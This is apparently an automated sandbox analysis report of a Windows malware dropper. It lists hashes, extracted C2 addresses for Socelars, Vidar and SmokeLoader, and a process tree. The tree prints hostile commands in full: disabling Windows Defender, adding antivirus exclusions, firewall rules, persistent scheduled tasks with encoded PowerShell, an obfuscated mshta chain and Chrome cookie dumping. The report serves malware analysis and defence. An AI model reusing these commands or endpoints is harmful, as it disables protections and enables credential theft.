Analysis

  • max time kernel
    154s
  • max time network
    153s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    20/12/2021, 14:03

General

  • Target

    42135aeff79cc4455ab885e0efbf74d91495c041b15adb547c5d1f0879de1a2d.exe

  • Size

    6.7MB

  • MD5

    09627559587e099b024796e1b61fbd4c

  • SHA1

    28cab95f8d7262958b09a3a622ff14196a05d52a

  • SHA256

    42135aeff79cc4455ab885e0efbf74d91495c041b15adb547c5d1f0879de1a2d

  • SHA512

    b8bc5e8afa775a7878e82e6a6fea355a1c61018bdafc9967f8b136ef999490b655daa4ae551c152b7f1e092797929e17f8bfa2d6d5d89865d078d03fe91c94ae

Malware Config

Extracted

Family

socelars

C2

http://www.biohazardgraphics.com/

Extracted

Family

vidar

Version

49.1

Botnet

915

C2

https://noc.social/@sergeev46

https://c.im/@sergeev47

Attributes
  • profile_id

    915

Extracted

Family

smokeloader

Version

2020

C2

http://rcacademy.at/upload/

http://e-lanpengeonline.com/upload/

http://vjcmvz.cn/upload/

http://galala.ru/upload/

http://witra.ru/upload/

rc4.i32
rc4.i32

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 4 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • NirSoft WebBrowserPassView 4 IoCs

    Password recovery tool for various web browsers.

  • Nirsoft 7 IoCs
  • Vidar Stealer 2 IoCs
  • ASPack v2.12-2.42 7 IoCs

    Detects executables packed with ASPack v2.12-2.42.

  • Downloads MZ/PE file
  • Executes dropped EXE 29 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Loads dropped DLL 12 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 5 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Looks up geolocation information via web service

    Uses a legitimate geolocation service to find the infected system's geolocation info.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Kills process with taskkill 3 IoCs
  • Modifies registry class 1 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 41 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\42135aeff79cc4455ab885e0efbf74d91495c041b15adb547c5d1f0879de1a2d.exe
    "C:\Users\Admin\AppData\Local\Temp\42135aeff79cc4455ab885e0efbf74d91495c041b15adb547c5d1f0879de1a2d.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3672
    • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
      "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:4316
      • C:\Users\Admin\AppData\Local\Temp\7zSCD050576\setup_install.exe
        "C:\Users\Admin\AppData\Local\Temp\7zSCD050576\setup_install.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:4004
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4424
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:396
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4436
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:300
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c Sat1246754647.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4716
          • C:\Users\Admin\AppData\Local\Temp\7zSCD050576\Sat1246754647.exe
            Sat1246754647.exe
            5⤵
            • Executes dropped EXE
            PID:2360
            • C:\Users\Admin\AppData\Local\Temp\is-KN6R9.tmp\Sat1246754647.tmp
              "C:\Users\Admin\AppData\Local\Temp\is-KN6R9.tmp\Sat1246754647.tmp" /SL5="$5003A,870426,780800,C:\Users\Admin\AppData\Local\Temp\7zSCD050576\Sat1246754647.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              PID:3124
              • C:\Users\Admin\AppData\Local\Temp\7zSCD050576\Sat1246754647.exe
                "C:\Users\Admin\AppData\Local\Temp\7zSCD050576\Sat1246754647.exe" /SILENT
                7⤵
                • Executes dropped EXE
                PID:2412
                • C:\Users\Admin\AppData\Local\Temp\is-D5NR0.tmp\Sat1246754647.tmp
                  "C:\Users\Admin\AppData\Local\Temp\is-D5NR0.tmp\Sat1246754647.tmp" /SL5="$50030,870426,780800,C:\Users\Admin\AppData\Local\Temp\7zSCD050576\Sat1246754647.exe" /SILENT
                  8⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  PID:4704
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c Sat125c6837fefc9.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:520
          • C:\Users\Admin\AppData\Local\Temp\7zSCD050576\Sat125c6837fefc9.exe
            Sat125c6837fefc9.exe
            5⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            PID:2080
            • C:\Users\Admin\Pictures\Adobe Films\f385xJqohThJ_S4i9aqhmluG.exe
              "C:\Users\Admin\Pictures\Adobe Films\f385xJqohThJ_S4i9aqhmluG.exe"
              6⤵
              PID:4120
            • C:\Users\Admin\Pictures\Adobe Films\PbizHT_GiNI_OBWBgT2O7KGz.exe
              "C:\Users\Admin\Pictures\Adobe Films\PbizHT_GiNI_OBWBgT2O7KGz.exe"
              6⤵
              PID:2160
            • C:\Users\Admin\Pictures\Adobe Films\sZ5WLF4gnGehdFz_RaGLerfr.exe
              "C:\Users\Admin\Pictures\Adobe Films\sZ5WLF4gnGehdFz_RaGLerfr.exe"
              6⤵
              PID:1140
              • C:\Users\Admin\Documents\I80SCQZWXpF_aGH7seYKqBTU.exe
                "C:\Users\Admin\Documents\I80SCQZWXpF_aGH7seYKqBTU.exe"
                7⤵
                PID:5904
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
                7⤵
                • Creates scheduled task(s)
                PID:2304
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
                7⤵
                • Creates scheduled task(s)
                PID:4696
            • C:\Users\Admin\Pictures\Adobe Films\dnEusqy0n2UlbCW2GeWfi9st.exe
              "C:\Users\Admin\Pictures\Adobe Films\dnEusqy0n2UlbCW2GeWfi9st.exe"
              6⤵
              PID:5088
            • C:\Users\Admin\Pictures\Adobe Films\IezJI9eppv8Mh8oMeW3FqRbZ.exe
              "C:\Users\Admin\Pictures\Adobe Films\IezJI9eppv8Mh8oMeW3FqRbZ.exe"
              6⤵
              PID:1840
              • C:\Users\Admin\AppData\Local\5e47281b-04e5-4cc7-8698-b5a4d9bbec6d.exe
                "C:\Users\Admin\AppData\Local\5e47281b-04e5-4cc7-8698-b5a4d9bbec6d.exe"
                7⤵
                PID:6108
              • C:\Users\Admin\AppData\Local\e3aefdc4-7104-4208-9a1d-ba637a78d7ee.exe
                "C:\Users\Admin\AppData\Local\e3aefdc4-7104-4208-9a1d-ba637a78d7ee.exe"
                7⤵
                PID:2396
              • C:\Users\Admin\AppData\Local\de1ec6cb-b27f-43f7-baed-2147d3570496.exe
                "C:\Users\Admin\AppData\Local\de1ec6cb-b27f-43f7-baed-2147d3570496.exe"
                7⤵
                PID:5276
              • C:\Users\Admin\AppData\Local\38ce38cd-754e-47e7-beba-c87b8ceb4f2c.exe
                "C:\Users\Admin\AppData\Local\38ce38cd-754e-47e7-beba-c87b8ceb4f2c.exe"
                7⤵
                PID:4900
              • C:\Users\Admin\AppData\Local\1dcf6d84-0acf-47a1-b54c-59f9f5dedd5b.exe
                "C:\Users\Admin\AppData\Local\1dcf6d84-0acf-47a1-b54c-59f9f5dedd5b.exe"
                7⤵
                PID:4572
            • C:\Users\Admin\Pictures\Adobe Films\P25dm9wh3jR4wL3mweXvqhb9.exe
              "C:\Users\Admin\Pictures\Adobe Films\P25dm9wh3jR4wL3mweXvqhb9.exe"
              6⤵
              PID:4312
            • C:\Users\Admin\Pictures\Adobe Films\Z3jtMs6ta7h1zfKHCA_xP81F.exe
              "C:\Users\Admin\Pictures\Adobe Films\Z3jtMs6ta7h1zfKHCA_xP81F.exe"
              6⤵
              PID:2136
            • C:\Users\Admin\Pictures\Adobe Films\JURcYUlgBJjMvTOR5Ih9xZj6.exe
              "C:\Users\Admin\Pictures\Adobe Films\JURcYUlgBJjMvTOR5Ih9xZj6.exe"
              6⤵
              PID:2128
            • C:\Users\Admin\Pictures\Adobe Films\KAD91NfhI1G1vIiW1WBr__4y.exe
              "C:\Users\Admin\Pictures\Adobe Films\KAD91NfhI1G1vIiW1WBr__4y.exe"
              6⤵
              PID:4024
              • C:\Users\Admin\Pictures\Adobe Films\KAD91NfhI1G1vIiW1WBr__4y.exe
                "C:\Users\Admin\Pictures\Adobe Films\KAD91NfhI1G1vIiW1WBr__4y.exe"
                7⤵
                PID:3224
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3224 -s 24
                  8⤵
                  • Program crash
                  PID:2728
            • C:\Users\Admin\Pictures\Adobe Films\5qd39TLFKNA_VeTlIQbFTaa8.exe
              "C:\Users\Admin\Pictures\Adobe Films\5qd39TLFKNA_VeTlIQbFTaa8.exe"
              6⤵
              PID:2728
              • C:\Users\Admin\Pictures\Adobe Films\5qd39TLFKNA_VeTlIQbFTaa8.exe
                "C:\Users\Admin\Pictures\Adobe Films\5qd39TLFKNA_VeTlIQbFTaa8.exe"
                7⤵
                PID:4212
            • C:\Users\Admin\Pictures\Adobe Films\r7vqnR0xrf1mL8p7XP7q2N55.exe
              "C:\Users\Admin\Pictures\Adobe Films\r7vqnR0xrf1mL8p7XP7q2N55.exe"
              6⤵
              PID:3852
              • C:\Users\Admin\AppData\Local\Temp\OneCleanerInst813932.exe
                "C:\Users\Admin\AppData\Local\Temp\OneCleanerInst813932.exe"
                7⤵
                PID:4996
              • C:\Users\Admin\AppData\Local\Temp\zhangting.exe
                "C:\Users\Admin\AppData\Local\Temp\zhangting.exe"
                7⤵
                PID:3780
                • C:\Users\Admin\AppData\Local\Temp\zhangting.exe
                  "C:\Users\Admin\AppData\Local\Temp\zhangting.exe" -u
                  8⤵
                  PID:5152
              • C:\Users\Admin\AppData\Local\Temp\Proxyupd.exe
                "C:\Users\Admin\AppData\Local\Temp\Proxyupd.exe"
                7⤵
                PID:1972
              • C:\Users\Admin\AppData\Local\Temp\inst.exe
                "C:\Users\Admin\AppData\Local\Temp\inst.exe"
                7⤵
                PID:4780
              • C:\Users\Admin\AppData\Local\Temp\setup.exe
                "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                7⤵
                PID:2948
              • C:\Users\Admin\AppData\Local\Temp\setup1.exe
                "C:\Users\Admin\AppData\Local\Temp\setup1.exe"
                7⤵
                PID:5200
              • C:\Users\Admin\AppData\Local\Temp\racoon.exe
                "C:\Users\Admin\AppData\Local\Temp\racoon.exe"
                7⤵
                PID:5312
              • C:\Users\Admin\AppData\Local\Temp\askhelp.exe
                "C:\Users\Admin\AppData\Local\Temp\askhelp.exe"
                7⤵
                PID:5400
              • C:\Users\Admin\AppData\Local\Temp\chrome update.exe
                "C:\Users\Admin\AppData\Local\Temp\chrome update.exe"
                7⤵
                PID:5724
              • C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe
                "C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"
                7⤵
                PID:5832
              • C:\Users\Admin\AppData\Local\Temp\logger.exe
                "C:\Users\Admin\AppData\Local\Temp\logger.exe"
                7⤵
                PID:5912
              • C:\Users\Admin\AppData\Local\Temp\chrome.exe
                "C:\Users\Admin\AppData\Local\Temp\chrome.exe"
                7⤵
                PID:6000
              • C:\Users\Admin\AppData\Local\Temp\chrome1.exe
                "C:\Users\Admin\AppData\Local\Temp\chrome1.exe"
                7⤵
                PID:6136
              • C:\Users\Admin\AppData\Local\Temp\chrome2.exe
                "C:\Users\Admin\AppData\Local\Temp\chrome2.exe"
                7⤵
                PID:720
            • C:\Users\Admin\Pictures\Adobe Films\z_dIUaHNLmGNcR2eEYUv1t5u.exe
              "C:\Users\Admin\Pictures\Adobe Films\z_dIUaHNLmGNcR2eEYUv1t5u.exe"
              6⤵
              PID:3864
            • C:\Users\Admin\Pictures\Adobe Films\loK8qrT_3dl0eUCxr7NsbPb_.exe
              "C:\Users\Admin\Pictures\Adobe Films\loK8qrT_3dl0eUCxr7NsbPb_.exe"
              6⤵
              PID:4664
              • C:\Windows\SysWOW64\mshta.exe
                "C:\Windows\System32\mshta.exe" vbsCrIPT: cLose ( CREatEObJECT ( "wSCripT.sHeLl" ).Run ( "C:\Windows\system32\cmd.exe /q /r TyPE ""C:\Users\Admin\Pictures\Adobe Films\loK8qrT_3dl0eUCxr7NsbPb_.exe"" > ..\ZCJQBxDe1bLl.exE && staRT ..\zCjQBxDe1bLl.exE /pVxJDYWtOoH4fPZQYK~Ihe & If """" == """" for %e In ( ""C:\Users\Admin\Pictures\Adobe Films\loK8qrT_3dl0eUCxr7NsbPb_.exe"" ) do taskkill /iM ""%~Nxe"" -f ", 0 , TrUe ) )
                7⤵
                PID:1112
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\system32\cmd.exe" /q /r TyPE "C:\Users\Admin\Pictures\Adobe Films\loK8qrT_3dl0eUCxr7NsbPb_.exe"> ..\ZCJQBxDe1bLl.exE && staRT ..\zCjQBxDe1bLl.exE /pVxJDYWtOoH4fPZQYK~Ihe & If "" == "" for %e In ( "C:\Users\Admin\Pictures\Adobe Films\loK8qrT_3dl0eUCxr7NsbPb_.exe" ) do taskkill /iM "%~Nxe" -f
                  8⤵
                  PID:6124
                  • C:\Users\Admin\AppData\Local\Temp\ZCJQBxDe1bLl.exE
                    ..\zCjQBxDe1bLl.exE /pVxJDYWtOoH4fPZQYK~Ihe
                    9⤵
                    PID:360
            • C:\Users\Admin\Pictures\Adobe Films\03YtOE00pXvhdDtGW8neB4Ah.exe
              "C:\Users\Admin\Pictures\Adobe Films\03YtOE00pXvhdDtGW8neB4Ah.exe"
              6⤵
              PID:4816
            • C:\Users\Admin\Pictures\Adobe Films\uULgUXye9012XpyfSiCgyp37.exe
              "C:\Users\Admin\Pictures\Adobe Films\uULgUXye9012XpyfSiCgyp37.exe"
              6⤵
              PID:3184
              • C:\Users\Admin\AppData\Local\Temp\7zS98FB.tmp\Install.exe
                .\Install.exe
                7⤵
                • Suspicious behavior: MapViewOfSection
                PID:4980
                • C:\Users\Admin\AppData\Local\Temp\7zSBD0D.tmp\Install.exe
                  .\Install.exe /S /site_id "525403"
                  8⤵
                  PID:1928
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &
                    9⤵
                    PID:5340
                    • C:\Windows\SysWOW64\forfiles.exe
                      forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
                      10⤵
                      PID:6056
                      • C:\Windows\SysWOW64\cmd.exe
                        /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
                        11⤵
                        PID:5524
                  • C:\Windows\SysWOW64\forfiles.exe
                    "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
                    9⤵
                    PID:5264
                    • C:\Windows\SysWOW64\cmd.exe
                      /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                      10⤵
                      PID:1676
                      • \??\c:\windows\SysWOW64\reg.exe
                        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                        11⤵
                        PID:5188
                  • C:\Windows\SysWOW64\forfiles.exe
                    "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                    9⤵
                    PID:2332
                    • C:\Windows\SysWOW64\cmd.exe
                      /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                      10⤵
                      PID:5884
                      • \??\c:\windows\SysWOW64\reg.exe
                        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                        11⤵
                        PID:2032
                      • \??\c:\windows\SysWOW64\reg.exe
                        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                        11⤵
                        PID:1784
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /CREATE /TN "gbPcfYwfQ" /SC once /ST 02:55:37 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                    9⤵
                    • Creates scheduled task(s)
                    PID:5920
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /run /I /tn "gbPcfYwfQ"
                    9⤵
                    PID:32
                                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\UNzIX8HBMNPNIWrpHYMyJ6ER.exe
                                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\UNzIX8HBMNPNIWrpHYMyJ6ER.exe"
                                                                                                                        6⤵
                                                                                                                          PID:1620
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                            C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                            7⤵
                                                                                                                              PID:2728
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                              C:\Users\Admin\AppData\Local\Temp\11111.exe /stab C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                              7⤵
                                                                                                                                PID:6100
                                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\Avk2EJbFUsCIGK5bsZwiZYCd.exe
                                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\Avk2EJbFUsCIGK5bsZwiZYCd.exe"
                                                                                                                              6⤵
                                                                                                                                PID:3840
                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
                                                                                                                                  7⤵
                                                                                                                                    PID:4484
                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \
                                                                                                                                    7⤵
                                                                                                                                      PID:5396
                                                                                                                                    • C:\Windows\System32\netsh.exe
                                                                                                                                      "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                                                                                      7⤵
                                                                                                                                        PID:5792
                                                                                                                                      • C:\Windows\System\svchost.exe
                                                                                                                                        "C:\Windows\System\svchost.exe" formal
                                                                                                                                        7⤵
                                                                                                                                          PID:2156
                                                                                                                                        • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                                          schtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM
                                                                                                                                          7⤵
                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                          PID:5900
                                                                                                                                        • C:\Windows\System32\netsh.exe
                                                                                                                                          "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                                                                                          7⤵
                                                                                                                                            PID:5348
                                                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\gESi6jZe4XXubaqPsnZBzWnB.exe
                                                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\gESi6jZe4XXubaqPsnZBzWnB.exe"
                                                                                                                                          6⤵
                                                                                                                                            PID:4940
                                                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\Y34pZCu0tloDrEzADK1GfR0B.exe
                                                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\Y34pZCu0tloDrEzADK1GfR0B.exe"
                                                                                                                                            6⤵
                                                                                                                                              PID:4544
                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4544 -s 124
                                                                                                                                                7⤵
                                                                                                                                                • Program crash
                                                                                                                                                PID:2480
                                                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\mL_OP84SRxNpVqtwErqce4eu.exe
                                                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\mL_OP84SRxNpVqtwErqce4eu.exe"
                                                                                                                                              6⤵
                                                                                                                                                PID:3200
                                                                                                                                              • C:\Users\Admin\Pictures\Adobe Films\wVrl_RNkDhDjjzFBnSphJP3Q.exe
                                                                                                                                                "C:\Users\Admin\Pictures\Adobe Films\wVrl_RNkDhDjjzFBnSphJP3Q.exe"
                                                                                                                                                6⤵
                                                                                                                                                  PID:4252
                                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\A6jOeaLH4C4GdpYuyL71mml1.exe
                                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\A6jOeaLH4C4GdpYuyL71mml1.exe"
                                                                                                                                                  6⤵
                                                                                                                                                    PID:4600
                                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\2OlzyWgRpkMlYDzuqkjfiqtu.exe
                                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\2OlzyWgRpkMlYDzuqkjfiqtu.exe"
                                                                                                                                                    6⤵
                                                                                                                                                      PID:4476
                                                                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\2OlzyWgRpkMlYDzuqkjfiqtu.exe
                                                                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\2OlzyWgRpkMlYDzuqkjfiqtu.exe" -u
                                                                                                                                                        7⤵
                                                                                                                                                          PID:5640
                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    C:\Windows\system32\cmd.exe /c Sat123037f78f205c.exe
                                                                                                                                                    4⤵
                                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                                    PID:588
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zSCD050576\Sat123037f78f205c.exe
                                                                                                                                                      Sat123037f78f205c.exe
                                                                                                                                                      5⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                      PID:1912
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                        6⤵
                                                                                                                                                          PID:1680
                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                            taskkill /f /im chrome.exe
                                                                                                                                                            7⤵
                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                            PID:4264
                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      C:\Windows\system32\cmd.exe /c Sat128942fc3c9a4e75.exe
                                                                                                                                                      4⤵
                                                                                                                                                      • Suspicious use of WriteProcessMemory
                                                                                                                                                      PID:780
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zSCD050576\Sat128942fc3c9a4e75.exe
                                                                                                                                                        Sat128942fc3c9a4e75.exe
                                                                                                                                                        5⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                        PID:1876
                                                                                                                                                        • C:\Users\Admin\AppData\Local\c8418d7b-b6c4-4659-b441-07aac87c585e.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Local\c8418d7b-b6c4-4659-b441-07aac87c585e.exe"
                                                                                                                                                          6⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          PID:3212
                                                                                                                                                        • C:\Users\Admin\AppData\Local\82479f0a-b741-43b9-b53a-c3bb2ed58093.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Local\82479f0a-b741-43b9-b53a-c3bb2ed58093.exe"
                                                                                                                                                          6⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          • Adds Run key to start application
                                                                                                                                                          PID:4244
                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\57308631\5207433252074332.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\57308631\5207433252074332.exe"
                                                                                                                                                            7⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            PID:5116
                                                                                                                                                        • C:\Users\Admin\AppData\Local\51bda4e0-9596-4be7-9c5f-e572e49e6715.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Local\51bda4e0-9596-4be7-9c5f-e572e49e6715.exe"
                                                                                                                                                          6⤵
                                                                                                                                                          • Executes dropped EXE
